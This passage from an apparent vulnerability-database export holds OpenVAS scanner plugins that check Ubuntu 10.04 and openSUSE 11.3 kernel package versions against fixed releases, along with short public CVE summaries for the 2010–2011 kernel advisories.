rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-tools-common\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-28-generic-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.32-28-generic-pae-di\", ver:\"2.6.32-28.55\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-12-12T11:19:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4163", "CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4073", "CVE-2010-4165", "CVE-2010-4072", "CVE-2010-3437", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-0435", "CVE-2010-4080", "CVE-2010-4169", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-3442", "CVE-2010-3874", "CVE-2010-4157", "CVE-2010-4347", "CVE-2010-3067", "CVE-2010-4164", "CVE-2010-3432", "CVE-2010-4078", "CVE-2010-4175", "CVE-2010-3861"], "description": "Check for the Version of kernel", "modified": "2017-12-08T00:00:00", "published": "2011-01-11T00:00:00", "id": "OPENVAS:850157", "href": "http://plugins.openvas.org/nasl.php?oid=850157", "type": "openvas", "title": "SuSE Update for kernel SUSE-SA:2011:001", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for kernel SUSE-SA:2011:001\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openSUSE 11.3 kernel was updated to fix various bugs and security\n issues.\n\n Following security issues have been fixed:\n CVE-2010-4347: A local user could inject ACPI code into the kernel\n via the world-writable "custom_debug" file, allowing local privilege\n escalation.\n\n CVE-2010-4258: A local attacker could use a Oops (kernel crash) caused\n by other flaws to write a 0 byte to a attacker controlled address\n in the kernel. This could lead to privilege escalation together with\n other issues.\n\n CVE-2010-4157: A 32bit vs 64bit integer mismatch in gdth_ioctl_alloc\n could lead to memory corruption in the GDTH driver.\n\n CVE-2010-4165: The do_tcp_setsockopt function in net/ipv4/tcp.c\n in the Linux kernel did not properly restrict TCP_MAXSEG (aka MSS)\n values, which allows local users to cause a denial of service (OOPS)\n via a setsockopt call that specifies a small value, leading to a\n divide-by-zero error or incorrect use of a signed integer.\n\n CVE-2010-4164: A remote (or local) attacker communicating over X.25\n could cause a kernel panic by attempting to negotiate malformed\n facilities.\n\n CVE-2010-4175: A local attacker could cause memory overruns in the\n RDS protocol stack, potentially crashing the kernel. So far it is\n considered not to be exploitable.\n\n CVE-2010-4169: Use-after-free vulnerability in mm/mprotect.c in the\n Linux kernel allowed local users to cause a denial of service via\n vectors involving an mprotect system call.\n\n CVE-2010-3874: A minor heap overflow in the CAN network module\n was fixed. Due to nature of the memory allocator it is likely not\n exploitable.\n\n CVE-2010-4158: A memory information leak in Berkeley packet filter\n rules allowed local attackers to read uninitialized memory of the\n kernel stack.\n\n CVE-2010-4162: A local denial of service in the blockdevice layer\n was fixed.\n\n CVE-2010-4163: By submitting certain I/O requests with 0 length,\n a local user could have caused a kernel panic.\n\n CVE-2010-0435: The Hypervisor in KVM 83, when the Intel VT-x extension\n is enabled, allows guest OS users to cause a denial of service\n (NULL pointer dereference and host OS crash) via vectors related to\n instruction emulation.\n\n CVE-2010-3861: The ethtool_get_rxnfc function in net/core/ethtool.c\n in the Linux kernel did not initialize a certain block of heap memory,\n which allowed local users to obtain potentially sensitive information\n via an ETHTOOL_GRXCLSRLALL ethtool command with a large info.rule_cnt\n value.\n\n CVE-2010-3442: Multiple integer overflows in the snd_ctl_ne ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"local privilege escalation, remote denial of service\";\ntag_affected = \"kernel on openSUSE 11.3\";\n\n\nif(description)\n{\n script_id(850157);\n script_version(\"$Revision: 8041 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 08:28:21 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-11 16:07:49 +0100 (Tue, 11 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2011-001\");\n script_cve_id(\"CVE-2010-0435\", \"CVE-2010-3067\", \"CVE-2010-3432\", \"CVE-2010-3437\", \"CVE-2010-3442\", \"CVE-2010-3861\", \"CVE-2010-3865\", \"CVE-2010-3874\", \"CVE-2010-4072\", \"CVE-2010-4073\", \"CVE-2010-4078\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4082\", \"CVE-2010-4083\", \"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-4162\", \"CVE-2010-4163\", \"CVE-2010-4164\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4175\", \"CVE-2010-4258\", \"CVE-2010-4347\");\n script_name(\"SuSE Update for kernel SUSE-SA:2011:001\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-extra\", rpm:\"kernel-ec2-extra~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vmi\", rpm:\"kernel-vmi~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vmi-base\", rpm:\"kernel-vmi-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vmi-devel\", rpm:\"kernel-vmi-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-default\", rpm:\"preload-kmp-default~1.1_k2.6.34.7_0.7~19.1.11\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-desktop\", rpm:\"preload-kmp-desktop~1.1_k2.6.34.7_0.7~19.1.11\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:26:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4165", "CVE-2010-4074", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-0435", "CVE-2010-3859", "CVE-2010-4080", "CVE-2010-4169", "CVE-2010-3877", "CVE-2010-3875", "CVE-2010-3876", "CVE-2010-3698", "CVE-2010-4248", "CVE-2010-4079", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-4160", "CVE-2010-3873", "CVE-2010-3448", "CVE-2010-4078"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1073-1", "modified": "2017-12-01T00:00:00", "published": "2011-02-28T00:00:00", "id": "OPENVAS:840592", "href": "http://plugins.openvas.org/nasl.php?oid=840592", "type": "openvas", "title": "Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1073-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1073_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1073-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, 